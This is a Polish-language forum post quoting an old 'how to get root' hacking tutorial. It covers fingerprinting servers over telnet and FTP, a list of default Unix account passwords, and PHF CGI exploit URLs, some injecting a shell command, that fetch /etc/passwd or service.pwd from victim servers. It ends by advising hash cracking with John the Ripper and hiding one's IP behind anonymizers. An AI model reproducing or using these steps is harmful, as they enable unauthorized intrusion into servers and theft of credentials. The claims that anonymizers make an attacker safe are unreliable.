Jak zdobyc roota..

Nisia

Użytkownik
Dołączył
Listopad 29, 2002
Posty
243
Moze za bardzo ci sie nie przyda ale kto wie... Od razu zaznaczam ze nie wiem czy skuteczne, bo w sumie malo mnie to obchodzi. Cytuje "Skanowanie powie ci wszystko na temat uruchomionych usług. Jeśli port 21 jest otwarty, to znaczy że mają serwer FTP, a jeśli 23 to znaczy, że mają telnet. Celem telnetowania się na stronę jest ustalenie jakiego systemu operacyjnego używają. Możesz użyć anonimowego telnetu z Cyberarmy.Com. Telnetuj się na port 23, lepiej zapisz jakie informacje otrzymales. Zmień port na 21. To wyśle cię na port 21 czyli telnet. Jeśli działa napisz SYST aby znaleźć to czego szukasz. Teraz jeśli masz szczęście spróbuj na 80, port HTTP. Zanotuj jeśli da ci to jakieś informacje. Musisz znać typ serwera jeśli naprawdę chcesz go zhackować. Jak chcesz użyć exploitów jeśli nie będziesz mógł ich skonfigurować dla danego systemu, albo znaleźć.Ostatnia szansa to uruchomić program Whats Running? Nie działa zawsze dobrze ale powinien dać ci typ serwera, może cię także zalogować na serwer ofiary. Możesz spędzić całe tygodnie próbując zaawansowanych technik z exploitami podszywaniem pod IP i Social Enginering żeby znaleźć to co otrzymamy wpisując:

$Login: root

$Password: root



Unix ma ustawione pewne hasła fabrycznie i często nie są one zmieniane. Nie używaj normalnego telnetu bo to pokaże twój IP. Z proxy i anonimowym telnetem zacznij pracę.

Spróbuj następujących kombinacji:

* login : passwd

* root : root

* sys : sys/system/bin

* bin : sys/bin

* mountfs : mountfsys

* adm : adm

* uucp : uucp

* nuucp : anon

* anon : anon

* user : user

* games : games

* install : install

* demo : demo

* umountfsys : umountfsys

* sync : sync

* admin : admin

* guest : guest

* daemon : daemon

Konta root, mountfsys, umountfsys, install, i czasami sync są na poziomie root'a, to znaczy mają pełną moc. Inne są na poziomie zwykłego użytkownika. Zakładając, że próbowałeś się zalogować na jakiegoś Unix'a, zapewne zastanawiałeś się jak system sprawdza poprawność haseł. Jest taki plik o nazwie 'passwd' na każdym Unix'ie w którym są przechowywane wszystkie hasła. Mimo że większość serwerów ma program 'PHF', upewnijmy się... To działa, pozwala zdobyć plik z hasłami, nawet jeśli jest ukryty a tylko 'root' ma dostęp do katalogów.

W "Overlord Anonymizerze" wpisz:

* http://www.costam.com/cgi-bin/phf?Qalias=x...t%20/etc/passwd

* http://www.costam.com/cgi-bin/php.cgi?/etc/passwd

* http://www.costam.com/~root/etc/passwd

* http://www.costam.com/~bin/etc/passwd

* http://www.costam.com/projects/archeo/wwwboard

* http://www.costam.com/_vti_prt/service.pwd

* http://www.costam.com/~user/_vti_prt/service.pwd

* http://www.costam.com/cgi-bin/phf?Qalias=x...t%20/etc/passwd *http://www.costam.com/cgi-bin/phf? ...&Qname=haqr&Qemail=&Qnickname=&Qoffice_phone=

*http://www.costam.com/cgi-bin/phf? cp /etc/passwd ~someuser/passwd &Qalias=&Qname=haqr&Qemail=

&Qnickname=&Qoffice_phone=

* http://www.costam.com/~someuser/passwd

*http://www.costam.com/cgi-bin/phf? ...&Qname=haqr&Qemail=&Qnickname=&Qoffice_phone=

Jeśli PHF jest aktywny (a przeważnie nie jest), zobaczysz plik 'etc/passwd' w swojej przeglądarce. Potem wystarczy już tylko go zapisać i uruchomić program rozkodowywujący na ten plik.

Teraz gdy zobaczysz słowa 'Uśmiechnij się! Jesteś w Ukrytej Kamerze!', to znaczy że serwer jest zabezpieczony przeciw włamaniom i ma twój IP. Ale nie martw się. Jeżeli użyłeś anonymizera, jesteś bezpieczny.

Jeżeli plik wygląda w ten sposób po otwarciu, to znaczy że masz szczęście:

root:2fkbNba29uWys:0:1:Operator:/:/bin/csh

admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh

A może wygląda w ten sposób:

root:*:0:1:Operator:/:/bin/csh

admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh

Jeżeli drugie pole jest zastąpione przez '*' lub 'x' to znaczy że hasło jest shadowowane i hasło nie może być odkodowane. Tak jest z większością haseł obecnie. Jednakże, jeżeli masz 'passwd' który posiada hasła nie shadowowane, możesz spróbować je odkodować (np: John The Ripper). " Dobra koniec bla bla bla, po co ja sie tu wysilam, heh co to za glupoty w ogole...
 
Do góry Bottom